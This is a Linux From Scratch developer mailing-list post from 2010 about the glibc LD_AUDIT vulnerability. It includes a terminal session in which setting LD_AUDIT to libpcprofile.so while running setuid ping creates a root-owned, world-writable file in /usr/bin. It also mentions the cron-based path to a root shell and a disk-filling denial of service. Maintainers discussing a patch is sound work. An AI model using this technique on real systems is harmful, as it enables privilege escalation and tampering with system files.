On 10/24/2010 09:48 PM, Bruce Dubbs wrote: > Bryan Kadzban wrote: > >> Ah, I think I see. You have to put libbad.so into /lib64 (emulating >> libpcprofile), then set LD_AUDIT to just "libbad.so.0", with no path. >> At that point it works as expected (at least for me). (Though this is a >> multilib setup. But ping is 64-bit; on a single-bit-width system you >> should be able to just use /lib instead.) > > I don't understand this issue. Wouldn't you need root to add anything > to /lib64 (which should be a symlink to /lib on LFS)? If you can do > that, there are a lot of easier ways to get a root shell. > > -- Bruce
No. The original exploit has two parts. The link that Bryan posted has full details. See below: dj [ ~ ]$ ls -l /usr/bin/bad ls: cannot access /usr/bin/bad: No such file or directory dj [ ~ ]$ umask 0 dj [ ~ ]$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/usr/bin/bad" ping ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored. ping: missing host operand Try `ping --help' or `ping --usage' for more information. dj [ ~ ]$ ls -l /usr/bin/bad -rw-rw-rw- 1 root dj 4 Oct 25 01:28 /usr/bin/bad dj [ ~ ]$ rm /usr/bin/bad rm: cannot remove `/usr/bin/bad': Permission denied dj [ ~ ]$ chmod 775 /usr/bin/bad chmod: changing permissions of `/usr/bin/bad': Operation not permitted dj [ ~ ]$ echo blah > /usr/bin/bad dj [ ~ ]$ cat /usr/bin/bad blah dj [ ~ ]$ sudo rm /usr/bin/bad dj [ ~ ]$ The file is not executable, so not much can be done with it (without utilizing cron as was done in the original example). Regardless, creating world writable files anywhere in the filesystem is bad. Even without cron as a means to get a root shell, this is dangerous enough. A simple DOS attack to fill the root file system might screw up the nightly backups for instance. Granted, there are multiple audit trails using that method... -- DJ Lucas -- This message has been scanned for viruses and dangerous content, and is believed to be clean. -- http://linuxfromscratch.org/mailman/listinfo/lfs-dev FAQ: http://www.linuxfromscratch.org/faq/ Unsubscribe: See the above information page
